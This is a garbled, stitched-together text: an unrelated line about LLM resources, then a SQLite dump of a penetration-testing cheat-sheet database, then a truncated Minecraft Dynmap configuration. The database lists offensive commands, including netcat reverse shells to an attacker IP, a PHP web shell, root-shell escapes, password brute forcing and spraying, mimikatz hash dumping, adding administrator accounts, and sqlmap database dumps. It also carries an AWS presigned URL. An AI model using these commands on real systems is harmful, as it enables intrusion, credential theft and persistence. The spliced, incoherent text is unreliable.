Continuously updated list of related resources for generative LLMs like GPT and their analysis and detection.

-- -- File generated with SQLiteStudio v3.2.1 on Sun Feb 7 14:58:28 2021 -- -- Text encoding used: System -- PRAGMA foreign_keys = off; BEGIN TRANSACTION; -- Table: Commands CREATE TABLE Commands (Command_No INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Name TEXT REFERENCES Programs (Name) NOT NULL, Description TEXT NOT NULL, Command TEXT, File BLOB); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (1, 'Kerbrute', 'brute single user password', 'kerbrute bruteuers [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (2, 'Kerbrute', 'brute username:password combos from file or stdin', 'kerbrute brutforce [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (3, 'Kerbrute', 'test a single password agains a list of users', 'kerbrute passwordspray [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (4, 'Kerbrute', 'Enumerate valid domain usernames via kerberos', 'kerbrute userenum [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (5, 'Name-That-Hash', 'Find the hash type of a string', 'nth --text ''<hash>''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (6, 'Name-That-Hash', 'Find the hash type of a file', 'nth --file <hash file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (7, 'Nmap', 'scan for vulnerabilites', 'nmap --script vuln <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (8, 'Nikto', 'Scan host for vulnerabilites', 'nikto -h <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (9, 'SMBClient', 'check for misconfigured anonymous login', 'smbclient -L \\\\<HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (10, 'Hydra', 'Brutforce a webpage looking for usernames', 'hydra -l <user wordlist> -p 123 <HOST_IP> http-post-form ''/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=<output string on failure>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (11, 'SMBMap', 'enumerates SMB file shares', 'smbmap -u <user> -p <pass> -H <host IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (12, 'WPScan', 'Enumerate Wordpress website', 'wpscan --url <wp site> --enumerate --plugins-detection', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (13, 'WPScan', 'enumerate though known usernames', 'wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (14, 'PowerShell', 'bypass execution policy', 'powershell.exe -exec bypass', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (15, 'TheHarvester', 'gathering informaiton from online sources', 'theharvester -d <domain> -l <#> -g -b google', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (16, 'Netcat', 'open a listener', 'nc -lvnp <port #>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (17, 'Netcat', 'Connect to computer', 'nc <attacker ip> <attacker port>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (18, 'GoBuster', 'Eunmerate directories on a website with a cookie', 'gobuster dir -u http://<IP> -w <wordlist> -x <extention> -c PHPSESSID=<cookie val>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (19, 'SQLMap', 'map sql at an IP', 'sqlmap -r <IP> --batch --force-ssl', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (20, 'John the Ripper', 'Use wordlist to parse hash', 'john <HASHES_FILE> --wordlist=<wordlist>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (21, 'John the Ripper', 'unencrypt shadow file', 'john <Unshadowed passwds>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (22, 'Unshadow', 'combine /etc/passwd and /etc/shadow file for cracking', 'unshadow <passwd> <shadow>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (23, 'Hashcat', 'crack hashes with a wordlist', 'hashcat -m <hash type> -a 0 -o <output file> <hash file> <wordlist> --force', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (26, 'Enum4Linux', 'basic command', 'enum4linux -a <IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (27, 'SMBClient', 'connect to a SMB share', 'smbclinet //<IP>/<share> -U <username>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (28, 'Netcat', 'connect with shell (-e doest always work)', 'nc -e /bin/sh <ATTACKING-IP> 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (29, 'Netcat', 'connect with shell (-e doest always work)', '/bin/sh | nc ATTACKING-IP 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (30, 'Netcat', 'done on the target', 'rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (31, 'SQLMap', 'Check form for SQL injection', 'sqlmap -o -u "http://meh.com/form/" –forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (32, 'SQLMap', 'automated SQL scan', 'sqlmap -u <URL> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (33, 'CrackMapExec', 'run a mimikatz module', 'crackmapexec smb <target(s)> -u <username> -p <password> --local-auth -M mimikatz', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (34, 'CrackMapExec', 'Command execution', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' -x whoami', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (35, 'CrackMapExec', 'check logged in users', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' --lusers', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (36, 'CrackMapExec', 'dump local SAM hashes', 'crackmapexec <target(s)> -u ''<uesrname>'' -p ''<password>'' --local-auth --sam', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (37, 'CrackMapExec', 'null session login', 'crackmapexec smb <target(s)> -u '''' -p ''''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (38, 'CrackMapExec', 'list modules', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (39, 'CrackMapExec', 'pass the hash', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (41, 'IKE-Scan', 'attack pre shared key with dictionary', 'psk-crack -d </path/to/dictionary> <psk file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (42, 'IKE-Scan', 'If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN', 'ike-scan <IP> -A -id GroupVPN', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (43, 'IKE-Scan', 'to find aggressive mode VPNs and save for use with psk-crack', 'ike-scan <IP> -A -P<file out>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (44, 'John the Ripper', 'crack passwords with korelogic rules', 'for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (45, 'Nmap', 'create a list of ip addresses ', 'nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (46, 'Linux commands', 'mount NFS share on linux', 'mount -t nfs server:/share /mnt/point', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (47, 'PowerShell', 'create new user', 'net user <username> <password> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (48, 'PowerShell', 'add user to a group (normaly Administrators)', 'net localgroup <group> <username> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (49, 'PSK-Crack', 'brute force with specified length and specified chars (if left blank default is 36)', 'psk-crack -b <#> --charset="<charlist>" <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (50, 'PSK-Crack', 'dictianary attack', 'psk-crack -d <file> <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (51, 'SQLMap', 'check form for SQL injection', 'sqlmap -o -u "<url of form>" --forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (52, 'SQLMap', 'Scan url for union + error based injection with mysql backend and use a random user agent + database dump', 'sqlmap -u "<form URL>?id=1>" --dbms=mysql --tech=U --random-agent --dump ', NULL); -- Table: Exploits CREATE TABLE Exploits (Target TEXT, Type TEXT, Criteria TEXT, Method TEXT, Code TEXT, Result TEXT, Notes TEXT); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Injection', 'ability to write to website folder', 'create or edit a mage of the website and insert the code to get remote access to the machine', '<? php system ($ _ GET [''cmd'']); ?>', 'execute code via url', '<URL of php>?cmd=<code to execue>'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'shell', 'enter code into the shell to find vulnerbilities int he machine', 'find / -perm -u=s -type f 2>/dev/null', 'SUID binaries', 'link output to GTFO bins and exploit'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Box', 'Priv Esc', 'Python binary running as root', 'generate a shell using python to grain root access', 'python3 -c "import pty;pty.spawn(''/bin/sh'');"', 'root shell', 'change pyton varibale acordingly'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('SQL', 'Priv Esc', 'MySQL binary running as root', 'enter into MySQL command line and break out into root y using the code', 'mysql> \! /bin/sh', 'get shell from root priv SQL', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'low privilage shell', 'use the code to search for programs that run as sudo without password', 'sudo -l', NULL, 'list programs that can be used with sudo and no password'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Windows', 'Priv Esc', 'Powershell', 'use code to enumerate priv esc opertunities', 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """', 'list of unquoted service paths that might be used for priv esc', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'LFI', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', NULL, 'use Linenum.sh to enumerate linux box', 'wget https://www.linenum.sh/ -P /dev/shm/Linenum.sh; chmod +x /dev/shm/linenum.sh ; ./dev/shm/Linenum.sh | tee /dev/shm/lininfo.txt', ' file, /dev/shm/lininfo.txt, with priv esc info', 'it is possible to use other methods of download like: curl or others found on google'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'No-Auth', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Re-Registration', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'JWT', 'a site that uses jSON as cookies', 'edit the information (with BURP) thats going to the website to gain access without authenitaction', NULL, NULL, NULL); -- Table: Programs CREATE TABLE Programs (Name text PRIMARY KEY NOT NULL UNIQUE, Stage TEXT, Description text, Info text, Features TEXT, Target TEXT, Offensive BOOLEAN, commands TEXT); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nmap', 'Enum', 'Used for scanning a network/host to gather more information', 'man pages on linux', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('BURP Suit', 'Enum, Exploit', 'A program for manipulating HTTP requests, enumeration and Exploit', 'https://portswigger.net/burp/documentation/contents', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Metasploit', 'All', 'Powerfull swiss-army-knife of hacking', 'https://docs.rapid7.com/metasploit/', NULL, 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('MSFVenom', 'Exploit', 'Designed for creating payloads', 'https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom', 'Payloads', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Snort', 'Utility', 'Packet sniffer', 'https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/249/original/snort_manual.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20210128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210128T192737Z&X-Amz-Expires=172800&X-Amz-SignedHeaders=host&X-Amz-Signature=4b51dc730677d14203c4a4cde25c1831ac64e9eca8df89c6737701811fa3f9fd', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('GoBuster', 'Enum', 'A fuzzer for websites', 'man pages on linux', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hydra', 'Exploit', 'Brutforcer for wesite passwords', 'man pages on linux', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Mimikatz', 'Post', 'Used to exploit kerberos', 'https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Impacket', 'Exploit', 'The fascilitator of python bassed script that uses modules for attacking windows ', 'https://www.secureauth.com/labs-old/impacket/', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Enum4Linux', 'Enum', 'for Enumerating Windows and Samba hosts', 'man pages included, https://tools.kali.org/information-gathering/enum4linux', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Rubeus', 'Exploit', 'Used for kerberos interaction and abuse', 'https://github.com/GhostPack/Rubeus', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Kerbrute', 'Enum, Exploit', 'quickly enumerate and brutforce active directory accounts through kerberos pre-authentication', 'https://github.com/ropnop/kerbrute/', 'Brute', 'Windows', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('John the Ripper', 'Exploit', 'a password brutforcer', 'https://www.openwall.com/john/doc/', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hashcat', 'Exploit', 'A password bruteforces', 'http://manpages.org/hashcat', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Bloodhound', 'Enum', 'Network mapping tool', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Wireshark', 'Utility', 'Packet sniffer', 'https://www.wireshark.org/download/docs/user-guide.pdf', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hash-Identifier', 'Utility', '(superseeded by Name-That-Hash)A simple python program for identifying hashes', 'man pages on linux', NULL, 'Hash', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Scp', 'Utility', 'For transfering files over SSH connection', 'man pages on llinux', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBClient', 'Utility', 'Used to connect to SMB file shares, can be used to enumerate shares', 'man pages on linux', 'Connect', 'SMB', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PowerShell', 'Utility', 'Powerfull comand line for Windows', 'https://www.pdq.com/powershell/', NULL, 'Windows', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Searchsploit', 'Enum', 'Local version of ExploitDB', 'https://www.exploit-db.com/searchsploit', 'Exploit Enum', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Vim', 'Utiility', 'Text editor', 'https://vimhelp.org/', NULL, 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('LinPeas', 'Post', 'For Enumerating Linux computers', 'Simply run on a linux computer', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nikto', 'Enum', 'For full enumeration on websites', 'https://cirt.net/nikto2-docs/', 'Exploit Enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Radare2', 'Utility', 'A tooll used to reverse engineer programs', 'https://github.com/radareorg/radare2/blob/master/doc/intro.md', 'Reverse', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Evil-WinRM', 'Exploit', 'Malware exuivilent of WinRM and used to exploit windows systems', 'https://github.com/Hackplayers/evil-winrm', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Seatbelt', 'Post', 'Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives', 'https://github.com/GhostPack/Seatbelt', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WinPeas', 'Post', 'For full enumeration of windows host (internal)', 'https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Lockless', 'Post', 'LockLess is a C# tool that allows for the enumeration of open file handles and the copying of locked files', 'https://github.com/GhostPack/Lockless', 'File interaction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SQLMap', 'Exploit', 'Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers', 'http://sqlmap.org/', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('KEETheif', 'Post', 'Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system', 'https://github.com/GhostPack/KeeThief', 'File interacction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('TheHarvester', 'Enum', 'The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database', 'https://tools.kali.org/information-gathering/theharvester', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('jSQLInjection', 'Enum', 'used for gathering SQL databse information form a distant source', 'https://tools.kali.org/vulnerability-analysis/jsql', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hping', 'Enum', 'Ping command on steroids, used to enumerating firewalls', 'https://tools.kali.org/information-gathering/hping3', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux Exploit Suggester', 'Post', 'keeps track of vulnerabilities and suggests exploits to gain root access', 'https://tools.kali.org/exploitation-tools/linux-exploit-suggester', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unix-PrivEsc-Check', 'Post', ' It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps, written in a single shell script so is easy to upload', 'https://tools.kali.org/vulnerability-analysis/unix-privesc-check', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Dotdotpwn', 'Enum', 'It’s a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers', 'https://tools.kali.org/information-gathering/dotdotpwn', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Websploit', 'Enum, Exploit', 'Swiss-army-knife of web exploits ranging from social engineering to honeypots and everything in between', 'https://tools.kali.org/web-applications/websploit', NULL, 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('XSSer', 'Enum', 'To detect, exploit and report XSS vulnerabilities in web-based applications', 'https://tools.kali.org/web-applications/xsser', 'Exploit enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Name-That-Hash', 'Utility', 'Hash-identifier with more deatils and command line based', 'https://github.com/HashPals/Name-That-Hash', NULL, 'N/A', 'N', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBMap', 'Enum', 'enumerate shares over a domin', 'https://tools.kali.org/information-gathering/smbmap', 'Scanning', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Redis-Cli', 'Exploit', 'used for interacting and exploiting reddis-cli on port 6379', 'https://book.hacktricks.xyz/pentesting/6379-pentesting-redis ; https://redis.io/topics/rediscli', 'SQL', 'SQL', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unshadow', 'POST', 'Combining passwd and shadow files into 1', 'simply use: unshadow <passwd file> <shadow file> > <output file>', 'Passwords', 'Hash', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WPScan', 'Enum', 'Look for vulnerabilities in wordpress site', 'https://github.com/wpscanteam/wpscan', 'Scanning', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Netcat', 'Utility', 'used for connecting 2 computers', 'https://www.win.tue.nl/~aeb/linux/hh/netcat_tutorial.pdf', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux commands', 'Post', 'Linux commands used for Priv esc', 'https://gtfobins.github.io, https://wadcoms.github.io', 'Priv Esc', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CrackMapExec', 'Enum,, Exploit', 'Swis army knife of network testing', 'https://ptestmethod.readthedocs.io/en/latest/cme.html', 'Scanning, Exploit', 'Networks', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('IKE-Scan', 'Enum', 'Used to dicover, fingerprint and test IPsec VPN systems', 'http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide', 'Scanning', 'VPN', NULL, NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PSK-Crack', 'Exploit', 'attempts to crack IKE Aggressive Mode pre-shared keys that have previously been gathered using ike-scan with the --pskcrack option', 'https://linux.die.net/man/1/psk-crack', 'Connect, Brute', 'Wifi', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CeWL', 'Enum', 'spiders a given url returning a wordlist that is intednded for cracking passwords', 'https://tools.kali.org/password-attacks/cewl', 'Brute', 'Web', 'Y', NULL); COMMIT TRANSACTION; PRAGMA foreign_keys = on;

# All paths in this configuration file are relative to Dynmap's data-folder: minecraft_server/dynmap/ # All map templates are defined in the templates directory # To use the HDMap very-low-res (2 ppb) map templates as world defaults, set value to vlowres # The definitions of these templates are in normal-vlowres.txt, nether-vlowres.txt, and the_end-vlowres.txt # To use the HDMap low-res (4 ppb) map templates as world defaults, set value to lowres # The definitions of these templates are in normal-lowres.txt, nether-lowres.txt, and the_end-lowres.txt # To use the HDMap hi-res (16 ppb) map templates (these can take a VERY long time for initial fullrender), set value to hires # The definitions of these templates are in normal-hires.txt, nether-hires.txt, and the_end-hires.txt # To use the HDMap low-res (4 ppb) map templates, with support for boosting resolution selectively to hi-res (16 ppb), set value to low_boost_hi # The definitions of these templates are in normal-low_boost_hi.txt, nether-low_boost_hi.txt, and the_end-low_boost_hi.txt # To use the HDMap hi-res (16 ppb) map templates, with support for boosting resolution selectively to vhi-res (32 ppb), set value to hi_boost_vhi # The definitions of these templates are in normal-hi_boost_vhi.txt, nether-hi_boost_vhi.txt, and the_end-hi_boost_vhi.txt # To use the HDMap hi-res (16 ppb) map templates, with support for boosting resolution selectively to xhi-res (64 ppb), set value to hi_boost_xhi # The definitions of these templates are in normal-hi_boost_xhi.txt, nether-hi_boost_xhi.txt, and the_end-hi_boost_xhi.txt deftemplatesuffix: lowres # Map storage scheme: only uncommoent one 'type' value # filetree: classic and default scheme: tree of files, with all map data under the directory indicated by 'tilespath' setting # sqlite: single SQLite database file (this can get VERY BIG), located at 'dbfile' setting (default is file dynmap.db in data directory) # mysql: MySQL database, at hostname:port in database, accessed via userid with password # mariadb: MariaDB database, at hostname:port in database, accessed via userid with password # postgres: PostgreSQL database, at hostname:port in database, accessed via userid with password storage: # Filetree storage (standard tree of image files for maps) type: filetree # SQLite db for map storage (uses dbfile as storage location) #type: sqlite #dbfile: dynmap.db # MySQL DB for map storage (at 'hostname':'port' in database 'database' using user 'userid' password 'password' and table prefix 'prefix' #type: mysql #hostname: localhost #port: 3306 #database: dynmap #userid: dynmap #password: dynmap #prefix: "" components: - class: org.dynmap.ClientConfigurationComponent - class: org.dynmap.InternalClientUpdateComponent sendhealth: true sendposition: true allowwebchat: true webchat-interval: 5 hidewebchatip: false trustclientname: false includehiddenplayers: false # (optional) if true, color codes in player display names are used use-name-colors: false # (optional) if true, player login IDs will be used for web chat when their IPs match use-player-login-ip: true # (optional) if use-player-login-ip is true, setting this to true will cause chat messages not matching a known player IP to be ignored require-player-login-ip: false # (optional) block player login IDs that are banned from chatting block-banned-player-chat: true # Require login for web-to-server chat (requires login-enabled: true) webchat-requires-login: false # If set to true, users must have dynmap.webchat permission in order to chat webchat-permissions: false # Limit length of single chat messages chatlengthlimit: 256 # # Optional - make players hidden when they are inside/underground/in shadows (#=light level: 0=full shadow,15=sky) # hideifshadow: 4 # # Optional - make player hidden when they are under cover (#=sky light level,0=underground,15=open to sky) # hideifundercover: 14 # # (Optional) if true, players that are crouching/sneaking will be hidden hideifsneaking: false # If true, player positions/status is protected (login with ID with dynmap.playermarkers.seeall permission required for info other than self) protected-player-info: false # If true, hide players with invisibility potion effects active hide-if-invisiblity-potion: true # If true, player names are not shown on map, chat, list hidenames: false #- class: org.dynmap.JsonFileClientUpdateComponent # writeinterval: 1 # sendhealth: true # sendposition: true # allowwebchat: true # webchat-interval: 5 # hidewebchatip: false # includehiddenplayers: false # use-name-colors: false # use-player-login-ip: false # require-player-login-ip: false # block-banned-player-chat: true # hideifshadow: 0 # hideifundercover: 0 # hideifsneaking: false # # Require login for web-to-server chat (requires login-enabled: true) # webchat-requires-login: false # # If set to true, users must have dynmap.webchat permission in order to chat # webchat-permissions: false # # Limit length of single chat messages # chatlengthlimit: 256 # hide-if-invisiblity-potion: true # hidenames: false - class: org.dynmap.SimpleWebChatComponent allowchat: true # If true, web UI users can supply name for chat using 'playername' URL parameter. 'trustclientname' must also be set true. allowurlname: false # Note: this component is needed for the dmarker commands, and for the Marker API to be available to other plugins - class: org.dynmap.MarkersComponent type: markers showlabel: false enablesigns: false # Default marker set for sign markers default-sign-set: markers # (optional) add spawn point markers to standard marker layer showspawn: true spawnicon: world spawnlabel: "Spawn" # (optional) layer for showing offline player's positions (for 'maxofflinetime' minutes after logoff) showofflineplayers: false offlinelabel: "Offline" offlineicon: offlineuser offlinehidebydefault: true offlineminzoom: 0 maxofflinetime: 30 # (optional) layer for showing player's spawn beds showspawnbeds: false spawnbedlabel: "Spawn Beds" spawnbedicon: bed spawnbedhidebydefault: true spawnbedminzoom: 0 spawnbedformat: "%name%'s bed" # (optional) Show world border (vanilla 1.8+) showworldborder: true worldborderlabel: "Border" - class: org.dynmap.ClientComponent type: chat allowurlname: false - class: org.dynmap.ClientComponent type: chatballoon focuschatballoons: false - class: org.dynmap.ClientComponent type: chatbox showplayerfaces: true messagettl: 5 # Optional: set number of lines in scrollable message history: if set, messagettl is not used to age out messages #scrollback: 100 # Optional: set maximum number of lines visible for chatbox #visiblelines: 10 # Optional: send push button 